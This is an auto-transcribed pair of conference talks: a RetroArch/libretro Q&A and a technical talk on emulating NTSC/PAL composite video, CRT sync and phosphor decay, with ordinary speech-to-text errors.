gotcha. Yeah. Yeah, so you can run a run cave story on this thing. There we go. Boom. Yeah, that's great. Cool. Yeah. I'm going to throw another question at you from Marcus week. Yeah, right. Yeah, here we go. So a previous speaker said that the emu devs are going to write a debugger to analyze the behavior of emulated games. What are the plans of retro arch to support such interfaces in an abstract way. Can you do something about that? Oh yeah, that's a good question. So, uh, LeBretro and retro art, they have some like memory, memory searching and debugging that you can do. And then you can do the call back. I think it's like memory get descriptors or something. Let me check what it's called. But as soon as your core implements the memory management stuff, front ends can grab certain memory through the core and do some really cool stuff. And people have built upon that. Lara Dell is he's a, he does some really cool work. Let me see if I can post a link to it inside the chat, but he's been working on a hackable console, which will do some really cool memory tricks in there. I'm going to post the URL to it. And this little, he's been posting some really awesome awesome screenshots of what he's been working on. So he's been focused on the Z 80 or Z 80 debugger for it. And then he, here's a, there's a tweet with a screenshot of him debugging all of the memory in the, in the disassembler kind of kind of blows my mind. That's a little cool stuff. In the later bedrooms everybody else can see them. There we go. Yeah. Yeah, people can get these links now. All right, cool. I think we got another question that seemed to get quite a couple of votes. One second. That was by Sylvia asks very early on. In case you're wondering I'm scrolling up because there's a lot of talk. All right, so I noticed that retro arch seems to have forks of many, many emulators with libretto included. How does the retro arts community make sure that patches are properly contributed back upstream and upstream is not alienated. That's a great question and one that I think is very important, making sure that we push up push up any changes that we make in the core fork up to the upstream repo repo that's very important. There have been times when, when we've, we've tried to take on a fork of a core, and then there's some like C99 changes that we want to make that are not, I'd say, appropriate for the, for the upstream. So we do try to work with people to make sure that we are pushing up changes that that make sense. There's been a whole bunch of contributions that we, we try to make I I've been trying to keep the forks as close to the actual upstream code as possible. There's a libretto mirrors organization that we've used for this. So, post a link to it in the emulators developers. There we go. So this libretto mirrors organization. This is where we, we host a lot of the, the, the get mirrors of a lot of the projects. So, for instance, blast them, I think it's hosted on on Git lab, I could be wrong. But there's been cases where there's a, an emulator that we want to build off of that's not using Git. So SVN for instance, we'd have to make a get mirror, and then build off of this get mirror. But that gives us a, a clean path to build patches and push those patches upstream. Yeah, so that's, that's definitely important. I'm glad that you asked that, but keeping the core in line with what's going on in the upstream. It's very clear answer. Thanks for that. I can't find it anymore but I think somebody also asks, why is emulation station not listed in your, when you were listing a couple of the front ends I think. Yeah, emulation station, I love emulation station. Emulation station. So for those of you who don't know, it gives you just a, like a, it's pretty much just a user interface in order to launch external applications. And with emulation station you can list a whole bunch of, you can add emulators, a whole bunch of lists of games and stuff and you can launch retro art from there. I didn't list it because it, I would like to list it a liberator front end. A lot of it has to do with implementing the liberator API directly in the application and emulation station it, it doesn't really implement the liberator API it just launches the internal applications. And it does kind of make sense, kind of as a front end but in reality it's just launching retro or any other liberal retro front end that you want to run. But it is, it is very similar. Yeah, I agree. Yeah, so that's the difference between a liberal retro front end and a, like a program launcher. Yeah, yeah. Let's see if there are any more questions and otherwise I'm just going to talk to you. I've been using retro arch for the longest time, like I said I used it on PSP I think I used it on PS3, at least PS3. Oh yeah. Yeah, that was a hassle to. Is it possible that I use it on PS2. Possible on the PS2. I would be surprised if it's not possible. But it just seems that this project just, it just keeps on going and going and so my question is sort of leading up to this. Oh, there is. So, there is a PS2 port. Oh, there is. Yeah. This is so long ago but I've got a PS2 here with like the big, the gray IDE cable at the back so you could look up a hard drive to it and stuff. Yeah. It's like a hilarious. I believe that I was using it there too. But yeah, you could run it on the UYA. The UYA is the. Google UYA, that thing? I don't know that thing. The thing that kicked off the Kickstarter's way back in the day. Yeah, the UYA was the pinnacle of retro gaming on a console. Speaking of these kind of projects, have you seen that there's a new Atari VCS console coming out? I think they call it the Atari Box or the Atari VCS. Atari VCS. Oh yeah. So this is a question of self interest too, because I've got that thing pre-ordered for the last two years. Is there any plans to run retro art on it? Or do you think would there be a lot of changes necessary? That's a really good question and I'm very interested in this as well. I'm not sure if they've opened up what's running on the hardware and if you can install your own. It's not fully open, but a lot of it should be open. There would be a way to get your own software running on it. And the SNES Mini was another one that came out not too long ago. That runs retro art as well? I'm not sure if you can install retro art on that. Or the SNES Classic? I thought I had a box of that over here, but I couldn't find it. When did you order the Atari one? Like at launch, so that's probably to you. I went on the Indiegogo thing and I stupidly thought it might still be coming, but for a while there was a question if they were ever going to release it. I'm getting a comment here, maybe you see the Atari VCS is just a Linux box, so porting it should be easy. Oh, that's really cool. I've got a funny question for Mammoth here. I can also ask this. I checked out your GitHub and I couldn't help but notice that you've got like 732 repositories there. Where do you find the time to work on all these GitHub repos? The majority of those are probably forks for pull requests that I was pushing up. Oh, I just filtered only the source repositories. There's only 188, so not that many. Yeah, I just love open source. I love experimenting with new technologies and making new features for open source projects. A lot of these are just experimenting. Most of them aren't actually full on projects. So while you might think it's a big number, it's really, it's all an illusion. But what do you think? What is it that most of your time goes towards in this project in RetroArch? I really, the thing that I'm really excited about RetroArch is the Libretro API and experimenting on getting, like easing the, how hard it is to get interesting projects going on. And then getting the interesting devices like this, like the RetroPie, putting together the little tick 80 Libretro core and then getting that on here. That was great fun. So for that, I had to make a core. I made the tick 80 database which indexes all of the tick 80 games. I created the thumbnails which will index all the thumbnails for tick 80. So, yeah, I just, I just love experimenting and seeing how far you can take the platform. Do you find yourself still playing a lot of games as well? Oh yeah. Yeah, lately I've been playing a lot of lots of war zone war zone is on my list lately. I've been playing, playing a lot of my own games just to test them. So the Dangerous Dave one that I put together, the Flappy Bird little clone that I made. Yeah. Oh, I have to admit that I actually didn't even know Dangerous Dave, but I see you at a Jarmiro wrote it. Yeah, yeah, it was, it was a, I loved playing it way back in the day. So, thought recreating it would be a fun experiment and I learned a lot about like 2D game development platforming and like entity systems. Pretty cool. Like components entity systems or. We're getting a question by the way from Marcus week, what are your long term goals for improving retro are are you chorus and how do you plan to archive them. Long term goals for retro. Well, a lot of the, a lot of the project right now is really focused on on the hardware, bringing LACA to more systems. So there was the crazy build bots, the new build bot stuff that we've, we've been working on. There's a blog post that just went live last week that outlined a whole bunch of the new build bot, looking to get more cores into there. Yeah, you mentioned you want to work on the build box. Like, what exactly, because it sounds like are you doing a lot of what's what's the short term stuff you're doing for the build. So the build bot, it will compile all of the different versions of retro that are out there, along with all the cores. So getting more, more platforms represented there is is a big thing. So, right now I don't think it compiles. So I'm working with the architectures for Mac. So making sure that it can get the 64 binaries in there. Making sure that it's, it's compiling across all of the different versions of windows as well. The, the arm Linux cores aren't aren't in there yet. So that's, that's another thing. There's going to be more down the pipeline. A lot of it is is, I've seen a whole bunch of changes go up for get lab, the get high as well. So making sure that all cores have the get lab actions represented is another thing. There's a whole bunch of bunch of work that we have a lot of work to do. So, see we have five minutes left actually. So speaking of a whole lot of work to do as a beginner. Is there anything or any advice you would give to a beginner how would they get started in in this. How could they contribute to retro rush or libretto. Yeah, that's a really good question. Getting involved is is is a really important libretto is all open source the whole, all the code that you can see is is available for for everything. So visit get hub.com slash libretto. And all of the repositories. If you're interested in having your own, your own games listed when you scan content that's the part of the database system so check out the database repository. There's, there's art as well that people need to have so if you're interested in making themes you can check out the assets. If you're interested in like debugging and testing out new versions you can also download the latest retro from the master like the live master and test out the version that's upcoming to close that issues and make sure that things are running so there's a whole bunch of things that people that we all rely on. So your involvement is definitely definitely needed. There's also the forums. Libretto has a discord as well so that you can chat with people directly. I really like using the discord for for net play so that you can have voice chats with people when you're playing with them online. So hopefully join the discord and we can start up some conversations and get some of my favorite features actually the net play. I like Tetris attack on the SNES. Oh Tetris attack. Yeah, that's amazing. Little like arcade games that I love playing that play with. I see some people typing in the first time systems going to cut us off in a couple minutes as well. It will automatically creates like a backup channel. But otherwise, is there anything that you would like to add that maybe you didn't say your presentation or some advice you would like to give people or just anything. I want to thank you all for for coming. It's been, it's been so amazing to see all of the momentum that Libretro and the community has brought over the past few years. Yeah, so keep up, keep it up, keep up, keep up those actions that you're been going on. It's pretty amazing. And thank you all for coming. Really appreciate it. Great. And thank you for also showing up just in time. Yeah, I was going to get my video wasn't working for some reason so I'm glad that it all got resolved. Great. Thanks for the talk. If people want to find you, I guess they can either message you on discord and I think article is that how you pronounce it is also available maybe on matrix. Yeah, thanks a lot and keep doing what you're doing. Yeah, thank you. Thanks for hosting. It's my great pleasure. Alright guys, see you next time.
|
RetroArch is a free, open-source and cross-platform frontend for emulators, game engines, video games, media players and other applications. The libretro API is designed to be fast, lightweight, portable, and without dependencies. Due to the number of systems and games it can play under a single user interface, RetroArch has grown immensely over the years, and has been well adopted by the emulation scene. Since its inception as SSNES and libsnes, libretro has grown much beyond its humble upbringings. libretro and RetroArch provide a way to connect different applications, emulators and game engines together in a single application. libretro has a unique mission design in turning the way applications are built on its head, by enabling the modularization of software. Instead of merely thinking in terms of a standalone application, software is redesigned and re-engineered to become a pluggable module that interfaces through a common API. Standalone applications implement this API to gain access to this module. Our belief is that by following this model, applications can be more easily updated and extended, since there is a clear separation between application and core domain. In this session, we will cover: What libretro is all about and its software model Interesting frontends and hardware you can use libretro cores and how to implement your own The ecosystem surrounding RetroArch What's next for the project Join Rob Loach, libretro maintainer, as he discusses how you can fully leverage the libretro API to bring modularized applications and systems together.
|
10.5446/53647 (DOI)
|
Hello and welcome to emulating full NTSC stack or creating objective video artifacts. My name is Thomas Hart. So, starting from the basics. A classic video display device, out of the purpose of this talk I'm going to treat cathode ray tubes as exemplar, outputs content by scanning from top left to bottom right. To achieve this, it maintains two current deflection positions, one horizontal, one vertical, which presides as approximate sawtooth. They're completely independent of one another, so the flying spot is always moving horizontally and it is always moving vertically. Therefore, the output is a series of shallow diagonal scans, as there's no such thing as a horizontal scan in traditional analog video output. That's the output, so what's the input? For the purposes of this presentation, the input is just the stream of intensities to paint separated by sync pulses. Approximately speaking, sync pulses are either long or short, indicating either a vertical or horizontal retrace, so you're going to need to measure the length of syncs and classify them the one way or the other. In real life, there are also things called the front and back porch, which help to ensure that no content is painted during retrace, and establish the amplitude range of what follows, and the sync pulses should carry things called equalization pulses, but I'm going to ignore all of that for the purposes of it today. Since the CRT's output spot is always moving, the sync inputs are advisory only. A CRT will try to pull its deflection generator into phase with them via a couple of phase locked loops, but their best effort only. To put it another way, a CRT is not going to pause and wait for a sync input, it's just going to keep on moving. A common kind of phase locked loop deployed in classic analog electronics is a simple flywheel sync. Each time the CRT discerns, say, a horizontal sync, it will measure how much error there is between the timing of its internal generator and the timing of the input. If its generator would have fired a little too early, then it slows it down a little. If it would have fired a little too late, it speeds it up. So let's look at what all that implies for potential implementations up front. We're going to have a bunch of pixels coming in, which we need to end up on the screen, so there's going to be some streaming to the GPU there. Output is going to be a series of one-dimensional scans, but since the scans actually have heights, we're going to generate them as quads, and those also are going to need to be streamed to the GPU. That suggests, in general, a pipeline where we're dividing data and generating scans on the CPU, posting them off to the GPU means we're going to have to have ideally some sort of shared memory space for passing them off, and if your graphics API allows it, seriously consider whether you want to disable textures to whistling. Normally, what a GPU does with a texture without trying to get too far into it is it tries to ensure good cache locality for pixels that are nearby in 2D terms, but in this case, you're always going to be referencing content from the left to right, top to bottom. Ideally you would keep a classic raster structure for caching purposes. So supposing you've implemented all of that, let's see where we are. Monochrome video works! We're also accurately modelling the effect of sync errors. I'm treating a little here by showing you a British computer with 50Hz power style timings, but the point carries across. This computer, the ZX80, is unable to generate video at the same time as it performs processing, and doesn't know what should be in the frame when it resumes video, so typing anything needs to a sync discontinuity. As you can see, our model display is initially out of phase each time I press a button, but it quickly locks back in. As the flywheel sync makes an acceleration decision, proportional to position, you end up with a dampened simple harmonic motion, which is a fancy way of saying that the error bounces like a sine wave as it resolves. And if that mention of mathematics is upset you, you probably want to skip the rest of this presentation. This is going to be a slog, specifically because I want to get into how colour was added to the existing monochrome television broadcasts while maintaining backwards compatibility. So the decision was made to divide up the existing luminous signal into a low frequency part, which would continue to describe luminance, and a high frequency part for chrominance, so in this context high frequency means around 3.58 MHz, or 227.5 cycles per line. So then the question arises, how can you ensure that chrominance information stays at the high frequency end of the spectrum? Now if it were one dimensional, then prima facie you could just amplitude modulate it, that is multiply the input level by a carrier wave, here a simple sine wave, but chrominance is actually two dimensional. So if you're going to follow that line of argument, then you need to find a two dimensional version of amplitude modulation, and luckily that exists. It's called quadrature amplitude modulation, in which the incoming two chrominance signals, here U and V, are multiplied by two different sine waves, which are exactly 90 degrees out of phase, which is called being in quadrature. So then allowing for luminance, the formula for the instantaneous output of an NTSC signal is as shown on this slide, it is Y for luminance, plus U times sine theta, plus V times cos theta for chrominance signals U and V. In real life, the U and V signals are scaled down a bit, so they have a lesser total amplitude than does the lumens, but it doesn't make a substantial difference to the mathematics, so I've omitted that constant here. I'm also glossing over a bunch of other smart moves that the designer has made, with regards to backwards compatibility. Rest assured that if you were to view a colour signal on a purely monochrome set that predated the introduction of the colour standards, then you would get what looked like a slightly noisy signal, but there wouldn't be anything too obviously wrong with it. That's partly because the colour subcarrier is not an integral multiple of the line rate, so the exact noise that it contributes varies from line to line, in this case it's exactly the opposite on one line to the next, and it's also because the total length of a field means that the noise on one specific line will change from field to field, so it's not consistent over time and it is not consistent over space. So once again, let's look at where we are. Here is a screenshot from the Atari 2600 of the video game Pitfall, now with composite colour information added. A few points worth making. The Atari 2600 actually generates off-spec video, specifically it makes each horizontal line slightly longer than it should be in order to squeeze in 228 colour cycles. As a result the colour subcarrier here shows as consistent vertical stripes. It's actually a fairly common thing for NTSC machines to do, the Apple II does the same thing, the TMS9918 machines and those that descend from it, such as the master system do the same thing, and the reason is that it simplifies the electronics, I mean you're outputting the same colour burst every single line and all the other timings are exactly in phase, it just simplifies the electronics. Okay so we've managed to add colour to the video signal, but how can we extract it again? Well let's assume that a thing called a low pass filter exists, which would be smart because it does, and what such a thing does is that it is a black box and you feed it an input signal and it gives you an output signal which is the same as the input except that all the high frequency parts have been taken out. Well if we had such a thing then we could get luminance back and leave chromatite zone and luckily we have many options for implementing such a thing. The most generic one is a finite impulse response filter which in implementation terms just amounts to a weighted average around an output point, you might have heard of them as processing kernels especially in the image processing world and they're naturally parallel stuff, ideal for GPUs. They're certainly not the only option, especially in a case like this there are some specific possibilities like comb filters and box filters and I will seek to return to those later. Okay so you've got your low pass filter, you've extracted your luminance, of course you can then subtract the luminance from the original signal to give you just the chromatite part so you're sitting on top of u times sine theta plus v times cos theta. How are you going to get back to UNV? Well we've multiplied by some things so maybe we could divide by some things but you can't really hear because both sine and cos sine go through zero so you would produce an asymptotic result. Okay well take a leap with me on this one, let's instead multiply. I'm going to focus for a bit on extracting just the u component and I'm going to assume that theta is known. Of course once you can extract u you can also extract v because there are just two things around a phase at 90 to theta so let's go with the multiplying. Okay, welcome to the most fun slide of the presentation, we're going to have a lot of fun here, let's go. Here in this box some product identities, we're going to take these as given, you can look them up if you like but all you need to know are and again trust me it's true. It's that sine theta sine phi equals cos theta minus phi minus cos theta plus phi over 2 and that cos theta sine phi equals sine theta plus phi minus sine theta minus phi all over 2. Those are just facts, roll with it. So starting up here, here's the u times sine theta plus v times cos theta we started with and as I told you we're going to multiply by sine theta and see what happens. Well that's not hard to write out more neatly, it's u times sine theta sine theta plus v times cos theta sine theta. Great, where did that get us? It got us to the point where we can use our product identities. So sine theta sine theta, we're going to treat that as sine theta sine phi and therefore substitute it in cos theta minus phi, well okay but in this case it's 2theta so theta equals phi so that's cos 0 and then subtract from that cos theta plus phi, well again they're both theta so that's cos 2theta and divide by 2 and then rolling on to the next side we've got v times cos theta sine theta, well that's this one then isn't it? Cos theta sine phi is sine theta plus phi so for us it's sine 2theta minus sine theta minus phi which is sine of 0 and divide that by 2, well okay but cos theta sorry cos 0 and sine 0 are clearly constants specifically cos 0 is 1 and sine 0 is 0 so we can simplify that a bit more it's now u times 1 minus cos 2theta over 2 plus v times sine 2theta over 2 which if we pull this apart a bit more is basically u times 1 over 2 or u over 2 plus a whole bunch of things that's a trigonometric functions of 2theta but if you'll recall on the last slide we assume to the thing called a low pass filter exists so we can just use another one of those we're going to get rid of everything that hangs around the 2theta sort of range and just keep the low part and magically we have extracted you, wow. Okay so that was thankfully the peak of the mathematics that I need to discuss today let's have another look back at the concrete implementation so this is how I implemented it, on the CPU I am still dividing the input into scans and producing quads and throwing them all off to the GPU and letting it deal with it, on the GPU I have two passes, in pass 1 apply a low pass filter to separate luminance from chrominance and at that stage multiply chrominance by a sine and cosine so the input is single channel the output is three channels in actual fact it's four for reasons to do with retaining information from the colour burst but again I'm kind of glossing over that for now. For GPU pass 2 then the input to that is the luminance signal plus the two multiplied chrominance signals so it's going to low pass the two chrominance signals in order to get their true values get rid of the 2theta part that we just discussed and I also chucked in an additional high pass filter on luminance so I could have done more of a windowing filter in pass 1 but then I would have had low information from luminance leaking into chrominance so I just decided to do it in two steps I'm sure that smarter people might do something smarter. At this point it's immediately before output so this is where I apply gamma correction if relevant. Most computers today have a hypothetical at least gamma of 2.2 which is exactly the same as NCSC so there's nothing to do there but PAL has a nominal gamma of 2.8 so if you were processing a PAL signal you'd want to do some further gamma correction. And that's it success well done you've implemented the whole thing here's pitfall in colour here's printer Persia in colour life is good. So let's return to the topic of low pass filtering because I kind of glossed over it a moment ago so as I said there's a very generic solution which is called a fur filter and it ends up being just a weighted average of input samples around a desired output sample so a question you might have in your mind is what coefficients what are you talking about well personally I use Kaiser Bezel to generate the coefficients that's pretty mathematically complicated I'm not sure I could adequately explain it but trust me it exists and it makes sense you'll also see windowed sync documented a lot so if you wanted in your code to have a generic I want to filter low pass cutoff frequency as this then I would recommend looking into one of those but there are other options in both coding terms and in real life a comb filter was eventually popular for filtering the luminance part out of an NTSC signal it's kind of a bit more expensive to implement on the analog side so we're talking later televisions here but regardless it makes the observation that if you were to sum y plus sin theta and y plus sin theta 180 degrees later you'd just get to y none of the sin stuff the sin stuff would drop out because sin theta plus 180 equals minus sin theta so if you took two samples that were 227.5 color cycles apart conformant NTSC terms that's one directly vertically above or below the other and you average them then supposing they had originally had exactly the same lumines and exactly the same chromance you would get exactly the correct output luminance later TVs actually did more of a I guess three or four point averaging not just across lines but also across fields and that's that's commonly referred to as a 3d comb I mean higher dimensionalities too but 3d comb will do is the marketing term that's really really late stage television stuff will probably in the late 90s now you've definitely got some digital electronics in there another easy solution for implementing on a GPU or a CPU is certainly easy to comprehend is just a box filter if you averaged every sample across the entire cycle of a sine wave then you should end up with a sum of zero so you can average across a single wave of the color subcarrier and hope to extract luminance that way that's obviously a strictly horizontal operation and is another one as I use sometimes it tends to produce a sharper output than a blind fire impulse response filter at least for the same number of input samples first are really great but ideally you would turn up the the number of input samples very high and that gets prohibitive in strictly real life implementation terms any case the point I'm making here I guess is play around with so a lot of this presentation has been specifically about cathode ray tubes so let's talk about for a moment some specifics of them and the question is what about phosphor decay so it's not really it's not really NTSC related but on a CRT many people perceive that frames one after another blend into one another that's not really true so when an actual CRT is painting a field actually only you know a fifth to a quarter of the display is listed any given time because phosphor decay really really quickly but psychology plus persistence of vision makes up for the rest you see a solid image because your brain thinks that's a more likely outcome than what it's actually seeing so I decided to implement phosphor decay and this was my first implementation buffer scans so the quads I produce just keep them around for longer keep them for several frames and every time I need to produce a frame of output I redraw every single one is still buffered with appropriate logarithmic decay or brightness which you know it's it's it's not too dissimilar from how a real display would be perceived other than the you know the fiction of talking about discrete lines and times of in terms of decay but it produces rolling brightness errors similar to those that you might get if you pointed a classic analog camcorder at a classic CRT so it didn't really like that implementation well I mean I liked the implementation I didn't like the result if it's even worth distinguishing those things so instead at the minute I use this kind of hand waving solution I came at it from this angle the objective is that every pixel on the screen should be consistent brightness so I can achieve that must easily by just keeping a persistent frame buffer which is sort of an accumulation buffer but not in the classic GP API sense but it is one accumulating things so go with it and I'm doing standard alpha blending of skins that is to say that new scants will be drawn with a certain opacity whatever let's say it's 0.7 and they will definitely be drawn by doing you know input times 0.7 plus whatever is already there times 0.3 which ends up being an oiler-esque discrete approximation of logarithmic decay for anything that is currently on screen since it will be progressively multiplied by 0.3 and then again by 0.3 so it's 0.3 to the to the number of times it's been overdrawn there's only one big drawback to that implementation and that is that you may not touch every pixel on display every field because during moments of sync error that are going to be parts of display that are not painted at all so to get around that I decided to use a stencil buffer so that means dividing scans into the frames in which they sit which is not something that I was otherwise doing and join each frame using the stencil to mark as painted anywhere that a pixel has been updated and then at the end of the frame of course I can inspect the stencil and apply a simple you know multiplied by 0.3 I'm going to keep sticking to those example constants for any pixel that was not overpainted and that gives you know let's roll with it kind of approximation of quote unquote phosphor decay and again I really want to emphasize this this is this is not a lot of science on this this slide this is a perception thing if you wanted nice solid vibrant colors you would definitely never ever do any blending and indeed ideally you'll do some sort of black frame insertion which is the exact opposite of what I'm doing here but I think that perceptually it's more accurate but I don't know attack me as you will so as a quick bonus let's discuss pal pal is like ntsc version 2 it was designed a few years after ntsc had gone into broadcast and was a response to some of the real life practical problems that ntsc creates specifically if you've ever seen an old-fashioned American television it has a tint control and that is to correct for phase errors which result from the analog electronics involved in the fact that in you know real analog terms things don't charge and discharge instantly and signals don't propagate instantly and the implementation doesn't quite match the mathematics. Pal attempts to resolve such phase errors by alternating phase each line indeed that's what the name comes from so on one line you will have phase going positively upwards it will start on the left at for argument's sake well it's just called n and it will end at the right on n plus something but in pal well on the next line the phase will go negatively so it will start at n and end at n minus something that's you might observe that cos of theta is equal to cos of minus theta and sin of theta is equal to minus sin of minus theta and therefore another way to describe the changes made in pal is that it flips the sign of one of the color subcomponent as amplitude modulated per line mathematically I do have these descriptions of the fixed pal makes is correct so because of that change a fully featured pal decoder can do something clever it can and I'm going to hand wave this one also it can kind of average the chromance line after line and thereby eliminate phase errors at the cost of some resolution our chromance resolution only lumens remains high resolution but if you if you don't want to you know implement a delay line another costly electronics it's costly in 1950s terms anyway 1960s then you can just implement a pal s decoder which acts almost exactly like ntsc every line is decoded separately and the colors come out as the colors come out and because of the specific exigencies of my implementation it's not particularly easy to correlate data from one line to the next so I've only implemented pal s also back in the day you might have seen pal s because of a desire to avoid some telefunken patents and you know boo patents so so let's see how my implementation does with pal s here we go so on the left is an undecoded version of the composite signal on the right there it is decoded and in the box out there is a zoom in of a different part of the same software title showing the the artifact that results in this case it's jumping up and down vertically a little that's because the particular computer this signal is a simulation of which is the acorn electron outputs an interlaced signal and in this case by gift capture it's kind of making it jump a bit more than it does when you're actually looking at it with your eyes. Trying to quick corollary of the video stack discussed so far today that your output is no longer frame centric the multipaths stop in my implementation breaks down only as far as individual lines but yours may be entirely continuous and the benefit of that is freedom from a classic emulation loop in which the emulated calculates and posts a frame blocks on bsync then calculates the next etc etc etc and the issue with that loop is that latency gets worse as computers get faster e.g. on a host computer that is infinitely fast calculating the next frame will be instant so with a loop as just discussed i.e. you know post and block then your emulator will wake up on vsync calculate a frame instantly push into the pipeline then block for the entirety of the output frame before waking again so you've at least one output frame of latency before any of what you just drew becomes visible and a full two frames of output latency before the final part of what you just drew hits the display so that's a one point five frame average but if you've modeled video output is continuous as per the presentation today then you can capture the current state of the CRT at any point by pull rather than by push assuming you can also observe vsync without blocking on it or make a reasonable projection of when it will occur which is what i do under cute just an average and a couple of standard deviations i probably need to test that more anyway that means the moment the host retrace begins you can quickly capture the current state of the emulated CRT and post that before the host display starts its next frame so the host reaches the bottom of its frame you then update the frame buffer while the raster is retracing the first bit of content that you've just posted will of course appear essentially immediately so latency of zero but the final bit will not appear until the end of the next frame which is therefore one frame but that gives you an average of zero point five frames latency rather than one point five so you've you've cut off two thirds of your average output latency and furthermore those frames that you're posting or the latency rather that i'm measuring that in that zero point five quote unquote frames their host frames not emulated machine frames so if your emulator is running on a machine with a high refresh rate monitor such as 120 hertz 144 hertz etc then that user will see a corresponding decrease in latency they you're actually giving them some value for the specialized equipment that they have invested their money in so they will probably come to your house and give you gifts of course this is quite different from the way things work in a classic pusher frame and weight emulator in which case such an emulator is going to output 60 frames a second end of story and those are going to appear on the 144 hertz monitor however they appear as a bit of an aside this is the other reason that I currently use an accumulation frame buffer above and beyond sort of attempting to appear crts with regards to phosphor decay in persistence it substantially softens the appearance of tearing in cases where the host and the emulated frequencies don't match up that well it's not only true of high frequency rate monitors it's also true of displaying 50 hertz signals at 60 hertz which speaking as a British person who now lives with the modern suite of available computers is a very good thing basically the choice there is between motion aliasing and softness so I picked softness my implementation at least on the Mac seeks further to minimize tearing by adding a phase locked loop to pull the host and the emulated vertical retraces into sync or into phase rather would be a more accurate way of saying that provided that they are sufficiently quote unquote compatible which in practice means that the host display has to be very close to being a divider of the emulated display in that case you shouldn't see any tearing at all provided that the mechanism is working and now something I personally haven't implemented yet but which is obviously another potential big win is full rate full racing of the raster so no on windows you can currently know you can directly pull for current raster position and on other platforms you can make a reasonable guess if you've observed that your vertical retrace interrupts soon to be coming in 60 times a second and you know it's been one one twentieth of a second since the last one you can reduce it you're probably about halfway down display although you can actually do any better job of that by making reasonable assumptions about retrace periods and so on regardless the point is you can have a pretty good idea of where the beam is just based on observing suitably high precision clock and using that information on any platform that allows tearing you can of course fully race the raster you can run your emulator completely in lockstep with the actual on the wire video output thereby almost completely eliminating output latency. So a quick grab bag of other items I should mention before concluding this presentation number one the colour burst I've kind of overlooked much mention of that at all so far the colour burst is a signal that occurs shortly before the visible part of the line which demonstrates the current phase and amplitude of the colour subcarrier. If there's no colour burst then a good display should decline to decode colour at all treating the input signal as purely monochrome so it's probably smart to include a pathway for that in any code you're writing in particular some old machines are monochrome such as the ZX80 that we already saw and some such as the Apple II can output a colour burst or no colour burst depending on the graphics mode. Number two PCM sampling rate let's suppose that you want to come up with a PCM sampling of NTSU data either because you're actually sampling an existing signal or because you're emulating it in that case make sure you do so at at least four times the colour clock rate I can't really go thoroughly into the mathematics behind that because I'm not especially qualified but here's a version I hope will persuade you if you had a single amplitude modulated signal then it would have an inherent frequency of whatever the frequency of the amplitude modulation is and therefore per Nyquist you would want to PCM sample that at twice the rate of the subcarrier but in this case we're talking quadrature amplitude modulation so we've kind of got the two amplitude modulated signals 90 degrees out of phase so you know you're kind of need to do like double Nyquist which turns into four times the colour clock I don't know if anybody is rolling their eyes I certainly hope I don't have any real mathematicians in the audience but that's the that's that's the rule of thumb four times the colour clock in my particular implementation I use whatever is the least integer multiple of the input pixel clock there's also at least four times the colour clock often leads to lines that are more like you know 1500 samples long than 1000 samples long but it's it's no big deal I should also say that in my particular implementation there is an additional GPU step additional pass that I kind of didn't mention because it's not relevant to a generic implementation that does input data conversion to raw PCM and clock rate conversion these are both kind of basic pixel manipulation things so they're more GPU stuff the objective there was that these CPU codes should have to do as little as possible to convert between the native pixel format of the machine being emulated and something it can post to the GPU there's still going to be some conversion because I have now nailed myself down to a fixed I know six or seven or eight pixel formats that I support but it's hopefully limited in particular I support some direct PCM format there's a couple of straightforward ones there's you know like one bit luminance data there's eight bit luminance data there's one slightly less straightforward one where you supply four luminance samples and the GPU picks whichever of those is appropriate given the current phase it helps with avoiding unrealistic numbers for certain machines it's a pragmatic pick I've got a couple that are luminance plus phase related that's a special case of color encoding that is used on at least a couple of notable machines from early in the home computer market specifically I'm thinking of well the Atari 2600 which isn't a home computer it's a home console and the various Vic machines from Commodore so the Vic 20 and the Commodore 64 they both internally represent color as as a luminance plus a phase offset so they have a single sine wave and they just push it back and forth depending on the selected color so I have a couple of a couple of pixel formats that directly represent that which is actually really neat so my Atari 2600 there is no RGB lookup table anywhere as directly just lumens plus phase which is calculated algorithmically based on the palette index and then the the entity decoding takes over and produces hopefully the correct colors and you saw the screenshots make your own mind up I also have various positions of RGB that was another slightly pragmatic choice there are some machines where RGB is you know two bits per channel for example well the master system is two bits per channel the abstract CPC is actually slightly less than that because it is three potential values per channel and in that case I didn't want to be streaming more data to the GPU than I really needed to so that that is an 8-bit RGB format for that a reasonable number of machines have you know 4096 color palette the Atari ST actually that's that's the ST I'm probably talking about there the Amiga the Apple 2GS so there's a there's a you know two byte format and then there's a full 4 byte for anything else it doesn't fit and also in my emulator it's not just necessarily decoding Palo NTSC sometimes it is encoding it because some machines are natively internally RGB and they just have black box Palo NTSC encoders about which often very little is known so for those I use generic encoders and just hope that the output looks reasonably close I mean it usually does so I don't know I can't claim 100% accuracy on those machines but that's the best information I have notably absent from that list are the Apple 2 and the Apple 2 a programmer actually directly generates the luminance output signal it's a one bit thing and they're directly poking bits high or low go straight onto the wire there is no color encoder the other one is the Oric the Oric is a British home computer and it has a color ROM so it has a off the top of my head I want to say 128 byte ROM probably have to look that up but inputs are phase as a two input actually it's in quadrature so two bits for that plus four bits for the currently selected color and the output is just the correct digital level to put directly on the wire which goes to a basic resistor ladder digital to analog converter so that ROM has been dumped and the emulator can use it directly and then of course there's a lot of the machines I mentioned there are actually luminance plus phase the ones I actually support these are 2600 and a bit 20 and in both of those cases you know it's not a generic power NTSC encoder it's a it's a generic luminance plus phase offset encoder but that's still queuing relatively close to the original hardware so that's everything I had to say here are some contact details I look forward to talking to you in a moment. Seems like we're live? Okay. I hope. Okay I'm going to take this last question and start. Okay it seems like we're live so hi Tom thanks for your really interesting talk I watched yesterday actually but I raised a lot of questions for me because that's it's way out of my league but whatever we're here to learn right so thanks again for being here didn't see that many questions yet though they're starting to come in so I'll start with the first one I saw is that is this implementation portable across multiple hardware implementations NTSC is NTSC but to certain computers or comes also weird stuff with a signal that has to be accounted for? So it certainly tries to be portable against all potential video generators and some of the machines I've added to the emulator have been specifically to test that so the emulator is actually like my specific implementation of this is coming on I don't know five years old maybe maybe six I'm not really I should pay more attention to these things but initially it was just the Atari 2600 which does generate video with frequency kind of baked in I'm losing track of my thoughts here. I've added a bunch of machines since but so a recent one actually the Apple 2 I only added a couple of years ago and that's because the Apple 2 the program is responsible for generating a large part of the color signals that was supposed to be the first time but I hadn't written like both sides of the equation in case I had a fundamental misunderstanding and I wasn't revealing it because I wasn't testing it but incredibly that did just work so yeah in principle if you've if you've allowed for the timings properly like different computers will have different relative phases line online although in NTSC world it's basically just either doing it correctly or remaining in phases is the main two as long as you're keeping that stuff keeping track of that and then in principle the same back end should work 